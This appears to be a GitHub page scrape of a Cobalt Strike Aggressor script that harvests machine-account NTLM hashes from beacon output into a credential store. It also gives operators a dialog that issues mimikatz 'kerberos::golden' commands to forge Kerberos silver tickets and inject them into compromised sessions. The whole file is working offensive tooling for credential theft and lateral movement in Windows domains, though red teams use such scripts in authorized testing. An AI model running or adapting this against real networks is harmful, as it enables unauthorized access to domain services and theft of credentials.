Permalink
Cannot retrieve contributors at this time
Fetching contributors…
Cannot retrieve contributors at this time
| # author: bluescreenofjeff | |
| #GUI to make Silver Tickets for a session. monitors output for machine hashes and adds them to the cred store | |
| #set global settings so user, domain, sid, service, and purge settings persist across usage | |
| %globalsettings['user'] = ''; | |
| %globalsettings['domain'] = 'example.local'; | |
| %globalsettings['domain-sid'] = 'S-1-5-21-000000000-1111111111-2222222222'; | |
| %globalsettings['service'] = 'cifs'; | |
| %globalsettings['purge'] = 'false'; | |
| #silver ticket monitor - monitors beacon output and adds machine accounts to cred store | |
| on beacon_output { | |
| if ($2 hasmatch 'Username : (.*\$).*[\n\r].*Domain : (.*)[\n\r].*NTLM : (.*)[\n\r]') { | |
| local('$machineaccount $domain $machinehash'); | |
| $machineaccount = matched()[0]; | |
| $domain = matched()[1]; | |
| $machinehash = matched()[2]; | |
| credential_add($machineaccount,$machinehash,$domain,"Silver Ticket Monitor",binfo($1,"internal")); | |
| } | |
| } | |
| #ticket generator gui | |
| sub silver-ticket { | |
| @bids = $1; | |
| @machinescompromised = @(); | |
| #make list of machine hashes compromised, place in array | |
| foreach $entry (credentials()) { | |
| if ($entry['user'] ismatch '(.*)\$') { | |
| $temp = matched()[0] . " - $entry['password']"; | |
| if ($temp !in @machinescompromised) { | |
| add(@machinescompromised, matched()[0] . " - $entry['password']"); | |
| } | |
| } | |
| } | |
| $dialog = dialog("Silver Ticket", %(user => %globalsettings['user'], domain => %globalsettings['domain'], domain-sid => %globalsettings['domain-sid'], service => %globalsettings['service'], purge => %globalsettings['purge']), lambda({ | |
| #save configurations to global settings | |
| %globalsettings['user'] = $3['user']; | |
| %globalsettings['domain'] = $3['domain']; | |
| %globalsettings['domain-sid'] = $3['domain-sid']; | |
| %globalsettings['service'] = $3['service']; | |
| %globalsettings['purge'] = $3['purge']; | |
| foreach $bid (@bids){ | |
| if ($3['purge'] eq 'true') { | |
| binput($bid,'mimikatz kerberos::purge'); | |
| bmimikatz($bid,'kerberos::purge'); | |
| } | |
| $targethost = split(' - ',$3['target'])[0]; | |
| $targethash = split(' - ',$3['target'])[1]; | |
| $mimikatz_command = "kerberos::golden /user: $+ $3['user'] /domain: $+ $3['domain'] /sid: $+ $3['domain-sid'] /target: $+ $targethost $+ \. $+ $3['domain'] /rc4: $+ $targethash /service: $+ $3['service'] /ptt"; | |
| binput($bid,"mimikatz $mimikatz_command"); | |
| bmimikatz($bid,$mimikatz_command); | |
| }; | |
| })); | |
| dialog_description($dialog, "This dialog generates a silver ticket for the chosen service and injects it into the current session."); | |
| drow_text($dialog, "user", "User:"); | |
| drow_text($dialog, "domain", "Domain FQDN:"); | |
| drow_text($dialog, "domain-sid", "Domain SID:"); | |
| drow_combobox($dialog, "target", "Target Host:", @machinescompromised); | |
| drow_text($dialog, "service", "Service:"); | |
| drow_checkbox($dialog, "purge", "Purge Kerberos Tray First?"); | |
| dbutton_action($dialog, "Build"); | |
| dialog_show($dialog); | |
| } | |
| #context menu | |
| popup beacon_bottom { | |
| item "Silver Ticket" { | |
| silver-ticket($1); | |
| } | |
| } |